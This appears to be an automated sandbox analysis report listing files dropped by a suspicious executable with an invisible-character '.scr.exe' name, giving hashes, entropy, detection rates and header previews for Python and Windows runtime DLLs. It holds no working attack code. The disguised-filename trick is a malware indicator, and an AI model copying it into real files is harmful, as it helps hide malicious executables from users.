Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Aj...j...j...c.C.n.......h.......f.......b.......i...Pa..h...!...h.......i...j.......Pa..k...Pa..k...Pa/.k...Pa..k...Richj...........................PE..d....Are.........." ...%.P..........P!.......................................@............`.........................................\|;..P....9.......0.......................;......................................P-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	88344
Entropy (8bit):	7.9102806934135135
Encrypted:	false
SSDEEP:	1536:PeAeeAQ2otR9fI9zq2FYDnbrEVmcrpr8byTjvO31IpZ1u37SyGxe:Zr9w9q2ODSmGpQyTjvOlIpZ1u3V
MD5:	CF374ECC905C5694986C772D7FC15276
SHA1:	A0EE612388A1C68013F5E954E9280BA0DB1BD223
SHA-256:	D94C8B2004A570D0F3B1CFD0333E4B1A82696FE199A1614D9054F8BFEF4BA044
SHA-512:	0074B3E365782721DE8D0A6EE4AA43871D9498EAE07A24443B84B755FA00EC3335E42AEDEEFED0499E642BDE9F4AD08843F36B97E095EF212EC29DB022676A42
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......RH:..)T..)T..)T..Q...)T..VU..)T..VQ..)T..VP..)T..VW..)T.,.U..)T.]QU..)T..)U.s)T.,.Y.,)T.,.T..)T.,....)T.,.V..)T.Rich.)T.........PE..d... Bre.........." ...%. ...............................................................`.........................................4...L....................P.........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pyd

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26904
Entropy (8bit):	7.416677958221918
Encrypted:	false
SSDEEP:	768:izemeFCt412MpaqIpQUYZ5YiSyv/AMxkEG:We7F6UqqIpQUYH7SynxC
MD5:	A56E79B7526129F06C4FEACF1F8ED117
SHA1:	99F4B0E65C01604F1F5BEAFF1C0549B1C5A807C5
SHA-256:	DFF778A28F75EA484A8E2E91C31235EB8D44128F5ACE83491E4FBE923ADDFFAD
SHA-512:	B1F1FEE24E1041424E5E05E2087440A6B9EB79AB57367D6F83FA83C6A39C7EB693D6EDAC9A7AC1C22A26109014FB4A12EF31B33775B23E857AFECA777AE0BBCB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z2.\.Sa..Sa..Sa..+...Sa..,`..Sa..,d..Sa..,e..Sa..,b..Sa.$.`..Sa.U+`..Sa..S`.USa.$.l..Sa.$.a..Sa.$...Sa.$.c..Sa.Rich.Sa.........PE..d....Are.........." ...%.0...............................................................`.............................................L.......P............`..............<..........................................@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	45336
Entropy (8bit):	7.71788244939252
Encrypted:	false
SSDEEP:	768:x1X8N3Hvl24aQ4V/npCjdsCsEWsVf+odBfnpw24IpLwlBa5YiSyv0axAMxkEX3:7Xo3PIQ0pChsvEWsF5dBfe24IpLwlB4X
MD5:	CD2BECB9C6DC5CC632509DA8CBD0B15D
SHA1:	28A705E779ED0E40651875CB62FA8E07D3E27E10
SHA-256:	2A56F2FDBD69A386924D2C00266F1A57954E09C9EB022280BE713D0C6EF805CE
SHA-512:	FB22B719D4DB4C50AB11984BA1BEF29A2154D3F2A283B9FA407FD5EC079B67BEDF188D5BB94B45B3D18E9000DCE11EBF8BB3CD35D465CCBE49C54E150D21A62A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|../8z.\|8z.\|8z.\|1.T\|>z.\|-..}:z.\|-..}5z.\|-..}0z.\|-..};z.\|...}:z.\|8z.\|.z.\|s..}1z.\|...}9z.\|...}9z.\|..8\|9z.\|...}9z.\|Rich8z.\|........PE..d....Bre.........." ...%.p.......... q....................................................`.........................................D...P....................0......................................................0}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\_sqlite3.pyd

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59160
Entropy (8bit):	7.8415704915035995
Encrypted:	false
SSDEEP:	1536:NW6W6CtwjHecGAg2FakvwzgoBr5EaOdIpOQ107SyTxJ:NW6vCtwjDgF/cucIpOQ10J
MD5:	A045491FAA0CBA94B3230B254DB7F2D2
SHA1:	11A87B7F872E24BAB0B278BD88C514B5788975B1
SHA-256:	79769E9318B6E525A145293AFFEDC97B5E7A2E994C88F9DF445B887DF75F92EE
SHA-512:	A279306E78F34FEED13DEDD7ECEDD226304D5F06746A14C0F9759A7191953DE6409B244D23629B25FE9C4A374528FFC6AC92BD1090E218EE5962815491FDCB43
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................}........................:...................:......:......:......:.....Rich...................PE..d...!Bre.........." ...%.........p..@........................................@............`..........................................;..P....9.......0..........8............;......................................@%..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\_ssl.pyd

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	67352
Entropy (8bit):	7.854645866844732
Encrypted:	false
SSDEEP:	1536:VoAuijXACpT59jGxJkHNcdU38umWs2EamTSqUCr5IpC7e3E7SyCxYM:mi0k4JkHmvL2ETmqUCFIpC7eU6
MD5:	7B0D6D717535BC48F0176FD6455A133B
SHA1:	A3FD5E6495D961EEAA66CCB7B2A8135812210356
SHA-256:	3E2D13BDA93C59FDD1B9BBB2B30C682774E8DA4503248E96E0E3C1B0FE588CE7
SHA-512:	861443C982A821F61BD971F57F65998366F325D084F21636E38F91AAAAC752E7DC2B2344F414DB3CB7FDDEC08210CFC197C1815A44E9B726FF5EABE2C62F42F9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........._..............V......................................f......e...........-............f.......f.......f:......f......Rich....................PE..d...#Bre.........." ...%.........@.......P...................................0............`.........................................l,..d....)....... ..........8............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-console-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12688
Entropy (8bit):	6.666783255943408
Encrypted:	false
SSDEEP:	192:WDGBWfhWxPWULwu0Sc2HnhWgN7aMWBHiOk9qnajMDkVt2:W+WfhWTD/HRN73hlQDkO
MD5:	F5625259B91429BB48B24C743D045637
SHA1:	51B6F321E944598AEC0B3D580067EC406D460C7B
SHA-256:	39BE1D39DB5B41A1000D400D929F6858F1EB3E75A851BCBD5110FE41E8E39AE5
SHA-512:	DE6F6790B6B9F95C1947EFB1D6EA844E55D286233BEA1DCAFA3D457BE4773ACAF262F4507FA5550544B6EF7806AA33428CD95BD7E43BD4AE93A7A4F98A8FBBD6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0............`.........................................`...,............ ...................#..............T............................................................................rdata..,...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-datetime-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12176
Entropy (8bit):	6.667879503485911
Encrypted:	false
SSDEEP:	192:W2WfhWoNLWULwu0Sc2HnhWgN7a8WaDwmvOk9qnajMDkfw:W2WfhWoLD/HRN75wOhlQDkfw
MD5:	38D6B73A450E7F77B17405CA9D726C76
SHA1:	1B87E5A35DB0413E6894FC8C403159ABB0DCEF88
SHA-256:	429EB73CC17924F0068222C7210806DAF5DC96DF132C347F63DC4165A51A2C62
SHA-512:	91045478B3572712D247855EC91CFDF04667BD458730479D4F616A5CE0CCEC7EA82A00F429FD50B23B8528BBEB7B67AB269FC5CC39337C6C1E17BA7CE1ECDFC1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....o*..........." .........................................................0......Z.....`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-debug-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12176
Entropy (8bit):	6.672949439516452
Encrypted:	false
SSDEEP:	192:WvMWfhWoZWULwu0Sc2HnhWgN7a8WHjmcsmsqnaj5fQ19IdOr:WvMWfhWozD/HRN7fcs9l1Gicr
MD5:	A53BB2F07886452711C20F17AA5AE131
SHA1:	2E05C242EE8B68ECA7893FBA5E02158FAE46C2C7
SHA-256:	59A867DC60B9EF40DA738406B7CCCD1C8E4BE34752F59C3F5C7A60C3C34B6BCC
SHA-512:	2CA8AD8E58C01F589E32FFAF43477F09A14CED00C5F5330FDF017E91B0083414F1D2FE251EE7E8DD73BC9629A72A6E2205EDBFC58F314F97343708C35C4CF6C4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....r.r.........." .........................................................0.......T....`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-errorhandling-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12176
Entropy (8bit):	6.728898668835788
Encrypted:	false
SSDEEP:	192:W4mxD3JbDWfhWoqEWULwu0Sc2HnhWgN7a8W1FFUOk9qnajMDkU0:W4AbDWfhWojD/HRN7aghlQDkz
MD5:	AB810B5ED6A091A174196D39AF3EB40C
SHA1:	31F175B456AB5A56A0272E984D04F3062CF05D25
SHA-256:	4BA34EE15D266F65420F9D91BAC19DB401C9EDF97A2F9BDE69E4CE17C201AB67
SHA-512:	6669764529EEEFD224D53FEAC584FD9E2C0473A0D3A6F8990B2BE49AAEEE04C44A23B3CA6BA12E65A8D7F4AEB7292A551BEE7EA20E5C1C6EFA5EA5607384CCAB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...Mz............" .........................................................0......#.....`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15760
Entropy (8bit):	6.617142193321366
Encrypted:	false
SSDEEP:	192:W/IAuVYPvVX8rFTs0WfhWoOWULwu0Sc2HnhWgN7a8WW52bTfvXqnajan5J7N0y:WFBPvVXuWfhWogD/HRN7D0XlOnP
MD5:	869C7061D625FEC5859DCEA23C812A0A
SHA1:	670A17EBDE8E819331BD8274A91021C5C76A04BA
SHA-256:	2087318C9EDBAE60D27B54DD5A5756FE5B1851332FB4DCD9EFDC360DFEB08D12
SHA-512:	EDFF28467275D48B6E9BAEEC98679F91F7920CC1DE376009447A812F69B19093F2FD8CA03CCCBDC41B7F5AE7509C2CD89E34F33BC0DF542D74E025E773951716
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d..._............." .........................................................@............`.........................................`................0...................#..............T............................................................................rdata..............................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12168
Entropy (8bit):	6.688511108737727
Encrypted:	false
SSDEEP:	192:WOMWfhW8WULwu0Sc2HnhWgN7asWatDwmcVTW1KqnajKswlZzX:W5WfhWaD/HRN7FwmEy4lGswldX
MD5:	1F72BA20E6771FE77DD27A3007801D37
SHA1:	DB0EB1B03F742CA62EEEBCA6B839FDB51F98A14F
SHA-256:	0AE3EE32F44AAED5389CC36D337D57D0203224FC6808C8A331A12EC4955BB2F4
SHA-512:	13E802AEF851B59E609BF1DBD3738273EF6021C663C33B61E353B489E7BA2E3D3E61838E6C316FBF8A325FCE5D580223CF6A9E61E36CDCA90F138CFD7200BB27
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...m............." .........................................................0.......,....`.........................................`...L............ ...................#..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l2-1-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12152
Entropy (8bit):	6.795365219000848
Encrypted:	false
SSDEEP:	192:WxVzWfhWFWULwu0Sc2HnhWgN7aMW/tImZdGP2qnajxfgX:WxVzWfhWvD/HRN7c3LlFfu
MD5:	C3408E38A69DC84D104CE34ABF2DFE5B
SHA1:	8C01BD146CFD7895769E3862822EDB838219EDAB
SHA-256:	0BF0F70BD2B599ED0D6C137CE48CF4C419D15EE171F5FAEAC164E3B853818453
SHA-512:	AA47871BC6EBF02DE3FE1E1A4001870525875B4F9D4571561933BA90756C17107DDF4D00FA70A42E0AE9054C8A2A76D11F44B683D92FFD773CAB6CDC388E9B99
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....'............" .........................................................0............`.........................................`................ ..................x#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-handle-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12176
Entropy (8bit):	6.693611789221205
Encrypted:	false
SSDEEP:	192:WrWfhWZWULwu0Sc2HnhWgN7aMWubjafvXqnajan5tu2:WrWfhWzD/HRN7XYXlOna2
MD5:	F4E6ECD99FE8B3ABD7C5B3E3868D8EA2
SHA1:	609EE75D61966C6E8C2830065FBA09EBEBD1EEF3
SHA-256:	FBE41A27837B8BE026526AD2A6A47A897DD1C9F9EBA639D700F7F563656BD52B
SHA-512:	F0C265A9DF9E623F6AF47587719DA169208619B4CBF01F081F938746CBA6B1FD0AB6C41EE9D3A05FA9F67D11F60D7A65D3DD4D5AD3DD3A38BA869C2782B15202
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0.......L....`.........................................`...`............ ...................#..............T............................................................................rdata..`...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12688
Entropy (8bit):	6.6505620878411085
Encrypted:	false
SSDEEP:	192:WZZlKWfhWomWULwu0Sc2HnhWgN7a8WyLhWOk9qnajMDks:WLlKWfhWo4D/HRN7LEhlQDks
MD5:	A0C0C0FF40C9ED12B1ECACADCB57569A
SHA1:	87ED14454C1CF8272C38199D48DFA81E267BC12F
SHA-256:	C0F771A24E7F6EDA6E65D079F7E99C57B026955657A00962BCD5FF1D43B14DD0
SHA-512:	122E0345177FD4AC2FE4DD6D46016815694B06C55D27D5A3B8A5CABD5235E1D5FC67E801618C26B5F4C0657037020DAC84A43FCEDBC5BA22F3D95B231AA4E7B3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....Bb.........." .........................................................0......'z....`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-interlocked-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12176
Entropy (8bit):	6.716058514516582
Encrypted:	false
SSDEEP:	192:W9WfhWo0WULwu0Sc2HnhWgN7a8WBinOk9qnajMDkFE:W9WfhWoSD/HRN7e2hlQDkFE
MD5:	41D96E924DEA712571321AD0A8549922
SHA1:	29214A2408D0222DAE840E5CDBA25F5BA446C118
SHA-256:	47ABFB801BCBD349331532BA9D3E4C08489F27661DE1CB08CCAF5ACA0FC80726
SHA-512:	CD0DE3596CB40A256FA1893621E4A28CC83C0216C9C442E0802DD0B271EE9B61C810F9FD526BD7AB1DF5119E62E2236941E3A7B984927FBA305777D35C30BA5A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0......N.....`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-libraryloader-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13192
Entropy (8bit):	6.656708616069495
Encrypted:	false
SSDEEP:	192:WkvuBL3BBLJWfhWiWULwu0Sc2HnhWgN7asWhpfH2vArqnajKsrw:WkvuBL3BrWfhWUD/HRN7QH24rlGsrw
MD5:	AA47023CEED41432662038FD2CC93A71
SHA1:	7728FB91D970ED4A43BEA77684445EE50D08CC89
SHA-256:	39635C850DB76508DB160A208738D30A55C4D6EE3DE239CC2DDC7E18264A54A4
SHA-512:	C9D1EF744F5C3955011A5FEA216F9C4ECA53C56BF5D9940C266E621F3E101DC61E93C4B153A9276EF8B18E7B2CADB111EA7F06E7CE691A4EAEF9258D463E86BE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0............`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-localization-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14728
Entropy (8bit):	6.718242382400788
Encrypted:	false
SSDEEP:	384:WpOMw3zdp3bwjGjue9/0jCRrndbWsWfhWOD/HRN7DlEnEQmDWlGs76Qq:8OMwBprwjGjue9/0jCRrndbG/DvhEE1t
MD5:	75EF38B27BE5FA07DC07CA44792EDCC3
SHA1:	7392603B8C75A57857E5B5773F2079CB9DA90EE9
SHA-256:	659F3321F272166F0B079775DF0ABDAF1BC482D1BCC66F42CAE08FDE446EB81A
SHA-512:	78B485583269B3721A89D4630D746A1D9D0488E73F58081C7BDC21948ABF830263E6C77D9F31A8AD84ECB5FF02B0922CB39F3824CCD0E0ED026A5E343A8427BC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....V............" .........................................................0............`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-memory-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12688
Entropy (8bit):	6.693787977570938
Encrypted:	false
SSDEEP:	192:WyqWfhWowWULwu0Sc2HnhWgN7a8Wi6msOk9qnajMDk7:WyqWfhWoOD/HRN78BhlQDk7
MD5:	960C4DEF6BDD1764AEB312F4E5BFDDE0
SHA1:	3F5460BD2B82FBEEDDD1261B7AE6FA1C3907B83A
SHA-256:	FAB3891780C7F7BAC530B4B668FCE31A205FA556EAAB3C6516249E84BBA7C3DC
SHA-512:	2C020A2FFBA7AD65D3399DCC0032872D876A3DA9B2C51E7281D2445881A0F3D95DE22B6706C95E6A81BA5B47E191877B7063D0AC24D09CAB41354BABDA64D2AF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....2..........." .........................................................0.......%....`.........................................`...l............ ...................#..............T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-namedpipe-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12176
Entropy (8bit):	6.794778399632109
Encrypted:	false
SSDEEP:	192:WqWfhWo+WULwu0Sc2HnhWgN7a8WYRK+sOk9qnajMDkBSF:WqWfhWoQD/HRN7oBhlQDkBSF
MD5:	D6297CFE7187850DB6439E13003203C6
SHA1:	9455184AD49E5C277B06D1AF97600B6B5FA1F638
SHA-256:	C8C2E69FB9B3F0956C442C8FBAFD2DA64B9A32814338104C361E8B66D06D36A2
SHA-512:	1954299FDBC76C24CA127417A3F7E826ABA9B4C489FA5640DF93CB9AFF53BE0389E0575B2DE6ADC16591E82FBC0C51C617FAF8CC61D3940D21C439515D1033B5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....5..........." .........................................................0............`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processenvironment-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13200
Entropy (8bit):	6.668461025084757
Encrypted:	false
SSDEEP:	192:W8WWfhWo9WULwu0Sc2HnhWgN7a8WC/OFOk9qnajMDkmUa:W8WWfhWoHD/HRN7PshlQDkmp
MD5:	E1239FA9B8909DCCDE2C246E8097AEBF
SHA1:	3D6510E0D80ED5DF227CAC7B0E9D703898303BD6
SHA-256:	B74FC81AEED00ECE41CD995B24AE18A32F4E224037165F0124685288C8FAE0BD
SHA-512:	75C629D08D11ECDDC97B20EF8A693A545D58A0F550320D15D014B7BCEC3E59E981C990A0D10654F4E6398033415881E175DFA37025C1FB20EE7B8D100E04CFD7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....h..........." .........................................................0............`.........................................`...H............ ...................#..............T............................................................................rdata..T...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14224
Entropy (8bit):	6.726978001238247
Encrypted:	false
SSDEEP:	384:WOWXk1JzNcKSIHWfhWoxD/HRN7rMphlQDk1z+:FbcKStxxDvre916
MD5:	73C94E37721CE6D642EC6870F92035D8
SHA1:	BE06EFF7CA92231F5F1112DD90B529DF39C48966
SHA-256:	5456B4C4E0045276E2AD5AF8F3F29CD978C4287C2528B491935DD879E13FDAF9
SHA-512:	82F39075AD989D843285BB5D885129B7D9489B2B0102E5B6824DCEE4929C0218CFC4C4BC336BE7C210498D4409843FAAA63F0CD7B4B6F3611EB939436C365E3A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....,-a.........." .........................................................0.......h....`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-1.dll

Download File

Process:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12688
Entropy (8bit):	6.717379913510996
Encrypted:	false
SSDEEP:	192:Wet2DfIe9jWfhWo3OWULwu0Sc2HnhWgN7a8WZkYfvXqnajan5CHB:Wet2DfIe9jWfhWo3gD/HRN7AXlOnG
MD5:	A55ABF3646704420E48C8E29CCDE5F7C
SHA1:	C2AC5452ADBC8D565AD2BC9EC0724A08B449C2D8
